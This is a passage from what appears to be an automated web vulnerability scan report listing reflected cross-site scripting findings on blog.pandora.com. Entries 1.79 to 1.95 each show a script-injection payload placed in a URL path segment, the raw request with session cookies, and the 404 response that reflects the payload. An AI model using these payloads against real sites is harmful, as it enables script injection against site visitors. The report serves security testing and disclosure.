Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/01a0649<script>alert(1)</script>9f0447f5c89/ was not found on this server.</p>
...[SNIP]...

1.79. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/02/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 39608<script>alert(1)</script>520f9e495aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora39608<script>alert(1)</script>520f9e495aa/archives/2007/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora39608<script>alert(1)</script>520f9e495aa/archives/2007/02/ was not found on this server.</p>
...[SNIP]...

1.80. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/02/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 94c6d<script>alert(1)</script>71c09bfa91f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives94c6d<script>alert(1)</script>71c09bfa91f/2007/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives94c6d<script>alert(1)</script>71c09bfa91f/2007/02/ was not found on this server.</p>
...[SNIP]...

1.81. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/02/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 133b4<script>alert(1)</script>487daa5efe0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007133b4<script>alert(1)</script>487daa5efe0/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007133b4<script>alert(1)</script>487daa5efe0/02/ was not found on this server.</p>
...[SNIP]...

1.82. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/02/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b33a6<script>alert(1)</script>2c3a3b69a5c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/02b33a6<script>alert(1)</script>2c3a3b69a5c/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/02b33a6<script>alert(1)</script>2c3a3b69a5c/ was not found on this server.</p>
...[SNIP]...

1.83. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/03/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac326<script>alert(1)</script>370b7b6a4ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraac326<script>alert(1)</script>370b7b6a4ed/archives/2007/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraac326<script>alert(1)</script>370b7b6a4ed/archives/2007/03/ was not found on this server.</p>
...[SNIP]...

1.84. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/03/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 90b22<script>alert(1)</script>4fb98f6e6f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives90b22<script>alert(1)</script>4fb98f6e6f6/2007/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives90b22<script>alert(1)</script>4fb98f6e6f6/2007/03/ was not found on this server.</p>
...[SNIP]...

1.85. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/03/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 413a3<script>alert(1)</script>9a08076521d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007413a3<script>alert(1)</script>9a08076521d/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007413a3<script>alert(1)</script>9a08076521d/03/ was not found on this server.</p>
...[SNIP]...

1.86. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/03/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d17eb<script>alert(1)</script>62f82312779 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/03d17eb<script>alert(1)</script>62f82312779/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/03d17eb<script>alert(1)</script>62f82312779/ was not found on this server.</p>
...[SNIP]...

1.87. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/04/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2c059<script>alert(1)</script>cbdd421d4ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora2c059<script>alert(1)</script>cbdd421d4ad/archives/2007/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2c059<script>alert(1)</script>cbdd421d4ad/archives/2007/04/ was not found on this server.</p>
...[SNIP]...

1.88. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/04/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b3228<script>alert(1)</script>c5395df2fbd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesb3228<script>alert(1)</script>c5395df2fbd/2007/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesb3228<script>alert(1)</script>c5395df2fbd/2007/04/ was not found on this server.</p>
...[SNIP]...

1.89. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/04/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a573a<script>alert(1)</script>1397d442dff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007a573a<script>alert(1)</script>1397d442dff/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007a573a<script>alert(1)</script>1397d442dff/04/ was not found on this server.</p>
...[SNIP]...

1.90. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/04/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86757<script>alert(1)</script>a841a197765 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/0486757<script>alert(1)</script>a841a197765/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/0486757<script>alert(1)</script>a841a197765/ was not found on this server.</p>
...[SNIP]...

1.91. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/05/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0cd0<script>alert(1)</script>6fc6995917b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorad0cd0<script>alert(1)</script>6fc6995917b/archives/2007/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorad0cd0<script>alert(1)</script>6fc6995917b/archives/2007/05/ was not found on this server.</p>
...[SNIP]...

1.92. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/05/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 590d0<script>alert(1)</script>cfaacaaf3db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives590d0<script>alert(1)</script>cfaacaaf3db/2007/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives590d0<script>alert(1)</script>cfaacaaf3db/2007/05/ was not found on this server.</p>
...[SNIP]...

1.93. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/05/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b6bf<script>alert(1)</script>7c9340a2e6a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20075b6bf<script>alert(1)</script>7c9340a2e6a/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20075b6bf<script>alert(1)</script>7c9340a2e6a/05/ was not found on this server.</p>
...[SNIP]...

1.94. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/05/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b5da7<script>alert(1)</script>d624e770f2a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/05b5da7<script>alert(1)</script>d624e770f2a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:21 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/05b5da7<script>alert(1)</script>d624e770f2a/ was not found on this server.</p>
...[SNIP]...

1.95. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/06/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8d9ba<script>alert(1)</script>060e4b9ef4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8d9ba<script>alert(1)</script>060e4b9ef4e/archives/2007/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
